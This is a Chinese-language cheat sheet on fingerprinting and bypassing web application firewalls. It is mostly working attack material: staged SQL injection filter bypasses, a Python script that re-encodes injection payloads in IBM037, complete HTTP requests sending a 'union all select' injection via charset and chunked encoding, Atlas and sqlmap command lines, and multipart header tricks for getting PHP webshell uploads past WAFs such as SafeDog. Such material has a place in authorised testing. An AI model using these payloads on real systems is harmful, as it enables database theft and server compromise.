识别专题
识别waf
cookie判断(例如Citrix,Netscaler,Yunsuo WAF,safedog)
有些人将自己与单独的标头关联(例如Anquanbao WAF,AmazonAWSWAF)。
有些经常更改标头和混乱的字符以使攻击者感到困惑(例如Netscaler,Big-IP)。
有些人在服务器头数据包中暴露自己(eg. Approach, WTS WAF)
一些WAF在响应内容body中公开自身(例如DotDefender,Armor,Sitelock)
其他WAF会对恶意请求做出不寻常的响应代码答复(例如WebKnight,360WAF
有些WAF会返回一堆垃圾数据,卡死你(例如:百度云加速乐)
检测waf
从浏览器发出普通的GET请求,拦截并记录响应头(特别是cookie)。
从命令行(例如cURL)发出请求,并测试响应内容和标头(不包括user-agent)。
向随机开放的端口发出GET请求,并抓住可能暴露WAF身份的标语。
如果某处有登录页面,表单页面等.请尝试一些常见的(易于检测的)有效负载,例如 " or 1=1 -- -
将../../../etc/passwd附加到URL末尾的随机参数
在url的末尾添加一些吸引人的关键字,如'or sleep(5)‘
使用过时的协议(如http/0.9)发出get请求(http/0.9不支持post类型查询)。
很多时候,waf根据不同的交互类型改变服务器头。
删除操作技术-发送一个原始的fin/rst包到服务器并识别响应。
侧通道攻击-检查请求和响应内容的计时行为。
sql注入常见过滤以及绕过方法
常见绕过方法
step1:
过滤关键词:and, or, union 可能正则: preg_match(’/(and|or|union)/i’, $id)
- Blocked: union select user, password from users
- Bypass: 1 || (select user from users where user_id = 1) = 'admin'
step2:
过滤关键词: and, or, union, where
- Blocked: 1 || (select user from users where user_id = 1) = 'admin'
- Bypass: 1 || (select user from users limit 1) = 'admin'
step3:
过滤关键词: and, or, union, where , limit
- Blocked: 1 || (select user from users limit 1) = 'admin'
- Bypass: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
step4:
过滤关键词: and, or, union, where ,limit , group by, select
- Blocked: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
- Bypass: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1
step5:
过滤关键词: and, or, union, where ,limit , group by , select
- Blocked: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
- Bypass: 1 || 1 = 1 into outfile 'result.txt'
- Bypass: 1 || substr(user,1,1) = 'a'
step6:
过滤关键词: and, or, union, where ,limit , group by , select , ’
- Blocked: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
- Bypass: 1 || user_id is not null
- Bypass: 1 || substr(user,1,1) = 0x61
- Bypass: 1 || substr(user,1,1) = unhex(61)
step7:
过滤关键词: and, or, union, where ,limit , group by , select,’,hex
- Blocked: 1 || substr(user,1,1) = unhex(61)
- Bypass: 1 || substr(user,1,1) = lower(conv(11,10,36))
step8:
过滤关键词: and, or, union, where ,limit , group by , select,’,hex , substr
- Blocked: 1 || substr(user,1,1) = lower(conv(11,10,36))
- Bypass: 1 || lpad(user,7,1)
step9:
过滤关键词: and, or, union, where ,limit , group by , select,’,hex , substr ,white space
- Blocked: 1 || lpad(user,7,1)
- Bypass: 1%0b||%0blpad(user,7,1)
burp插件bypasswaf
参数
①IP伪造
②Content-type-->绕waf根据已知类型解码/评估
③host--> 配置不当的WAF可能配置为仅根据此标头中找到的主机的正确FQDN来评估请求,这是此绕过目标
④pathinfo-->随机路径注入功能-->构造路径-->类似于路径fuzzing
⑤PathObfuscation-->路径混淆
原来请求-->/get/?id=;netstat%20-ant
构造后-->/get///?id=;netstat%20-ant HTTP/1.1
⑥HPP 参数污染
原始攻击:/get/?id=;netstat%20-ant
参数污染攻击:/get/?id=;netstat%20-ant&id=test&id=test&id=test
⑦SpaceEncoding(对空格进行编码)
原始攻击:/get/?id=;netstat%20-ant
url编码
%u编码
/get/?id=;netstat%u0000-ant
实战
案例① 字符编码绕waf
POST /sample.aspx?input0=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 41
input1='union all select * from users--
字符编码脚本
import urllib
def paramEncode(params="", charset="IBM037", encodeEqualSign=False, encodeAmpersand=False, urldecodeInput=True, urlencodeOutput=True):
result = ""
equalSign = "="
ampersand = "&"
if encodeEqualSign:
equalSign = equalSign.encode(charset)
if encodeAmpersand:
ampersand = ampersand.encode(charset)
params_list = params.split("&")
for param_pair in params_list:
param, value = param_pair.split("=")
if urldecodeInput:
param = urllib.unquote(param).decode('utf8')
value = urllib.unquote(value).decode('utf8')
param = param.encode(charset)
value = value.encode(charset)
if urlencodeOutput:
param = urllib.quote_plus(param)
value = urllib.quote_plus(value)
if result:
result += ampersand
result += param + equalSign + value
return result
# for IIS
print paramEncode("input1='union all select * from users--")
# prints %89%95%97%A4%A3%F1=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60
bypass
POST /sample.aspx?%89%95%97%A4%A3%F0=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 115
%89%95%97%A4%A3%F1=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60
目标 | Post(application/x-www-form-urlencoded) 【支持得编码格式,我们可以根据这些不常见得编码格式绕过各种waf】 |
---|---|
Nginx,uWSGI-Django-Python3 | IBM037,IBM500,cp875,IBM1026,IBM273 |
Nginx,uWSGI-Django-Python2 | IBM037,IBM500,cp875,IBM1026,utf-16,utf-32,utf-32BE,IBM424 |
Apache-TOMCAT8-JVM1.8-JSP | IBM037,IBM500,IBM870,cp875,IBM1026,IBM01140,IBM01141,IBM01142,IBM01143,IBM01144,IBM01145,IBM01146,IBM01147,IBM01148,IBM01149,utf-16,utf-32,utf-32BE,IBM273,IBM277,IBM278,IBM280, IBM284,IBM285,IBM290,IBM297,IBM420,IBM424,IBM-Thai,IBM871,cp1025 |
Apache-TOMCAT7-JVM1.6-JSP | IBM037,IBM500,IBM870,cp875,IBM1026,IBM01140,IBM01141,IBM01142,IBM01143,IBM01144,IBM01145,IBM01146,IBM01147,IBM01148,IBM01149,utf-16,utf-32,utf-32BE,IBM273,IBM277,IBM278,IBM280, IBM284,IBM285,IBM297,IBM420,IBM424,IBM-Thai,IBM871,cp1025 |
Apache -PHP5(mod_php和FastCGI) | None |
IIS8-PHP7.1-FastCGI | None |
IIS6、7.5、8、10 -ASP经典 | None |
IIS6、7.5、8、10 -ASPX(v4.x) | IBM037,IBM500,IBM870,cp875,IBM1026,IBM01047,IBM01140,IBM01141,IBM01142,IBM01143,IBM01144,IBM01145,IBM01146,IBM01147,IBM01148,IBM01149,utf-16,unicodeFFFE,utf-32,utf-32BE,IBM273,IBM277, IBM278,IBM280,IBM284,IBM285,IBM290,IBM297,IBM420,IBM423,IBM424,x-EBCDIC-KoreanExtended,IBM-Thai,IBM871,IBM880,IBM905,IBM00924,cp1025 |
案例2 chunked 绕waf(分块绕waf)
分块编码bypass
如
未bypass
POST /sample.aspx?input0=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 41
input1='union all select * from users--
bypass
POST /sample.aspx?input0=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 110
Transfer-Encoding: chunked
5;
input
4;
1='u
5;
nion
4;
all
5;
selec
4;
t *
4;
from
5;
user
3;
s--
0
waf类型总结
常见waf绕过
sql注入类绕过
①安全狗绕过
sql注入绕安全狗
内联绕过
/!80000aaa/–>里面符号常见/!50001/类
如
order/*!80000aaa*/by/*!80000aaa*/16
②利用工具去fuzz绕
sql注入bypass waf 自动测试的
https://github.com/m4ll0k/Atlas
GET类型的注入
python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
POST类型的注入
python atlas.py --url http://site.com/index/id/ -m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
请求头注入
python atlas.py --url http://site.com/index/id/ -H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
组合tamper
python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v
列出tamper
python atlas.py -g
例子
注入
python sqlmap.py -u 'http://site.com/index.php?id=Price\_ASC' --dbs --random-agent -v 3
文件上传类绕过
文件上传内容绕安全狗
绕内容
免杀马或者内容疯狂增加进行绕
③绕流量
蚁剑绕
或者直接上传大马绕
后缀绕过
常见黑名单
asp|asa|cer|cdx|aspx|ashx|ascx|asax
php|php2|php3|php4|php5|asis|htaccess
htm|html|shtml|pwml|phtml|phtm|js|jsp
vbs|asis|sh|reg|cgi|exe|dll|com|bat|pl|cfc|cfm|ini
绕过原理
因此可以绕的思路就有在
在Content-Disposition: form-data; name=“file_x”; filename="xx.php"和Content-Type里疯狂加减内容去改就好了
以前出现过的绕过情况
#通用的一些绕过技巧
1.引号改变
1.1去掉引号
#去掉name的引号
Content-Disposition: form-data; name=file_x; filename="xx.php"
#去掉filename的引号
Content-Disposition: form-data; name="file_x"; filename=xx.php
#两个的引号都去掉
Content-Disposition: form-data; name=file_x; filename=xx.php
1.2把双引号变成单引号
2.大小写-->这三个字段进行大小写,在以前可以绕安全狗
Content-Disposition
name
filename
3.在: ; =添加1个或者多个空格去绕。
4.直接去掉或修改Content-Disposition值,把form-data给去掉
5.交换filename和name的位置
6.多写
6.1如双写filename
Content-Disposition: form-data; name="file_x"; filename="test.txt"; filename="test.php"
6.2双写
------WebKitFormBoundaryj1oRYFW91eaj8Ex2 Content-Disposition: form-data; name="file_x"; filename="test.txt" Content-Type: text/javascript
------WebKitFormBoundaryj1oRYFW91eaj8Ex2 Content-Disposition: form-data; name="file_x"; filename="test.php" Content-Type: text/javascript
------WebKitFormBoundaryj1oRYFW91eaj8Ex2 Content-Disposition: form-data; name="submit_x"
upload ------WebKitFormBoundaryj1oRYFW91eaj8Ex2--
6.3双写分号-->导致解析不到文件名导致绕过
#特殊的绕过技巧-->针对语言的
php语言的
①添加字符的
1.1 header的boundary添加
Header处的boundary前添加任意字符(原因:php有些能支持解析这种)
Content-Type: multipart/form-data; bypassboundary=----WebKitFormBoundaryj1oRYFW91eaj8Ex2
1.2
filename和name前添加
nb;filename="test.php";
②filename换行-->即filename处拆为file name(以前这种可以绕某盾)
Content-Disposition: form-data; name="file_x"; file name="test.php"
以前出现过的waf绕过案例
案例
绕后缀
Content-Disposition: 处理的不是很好, 当长度增加到48930的时候,安全狗的上传防御就失效了
如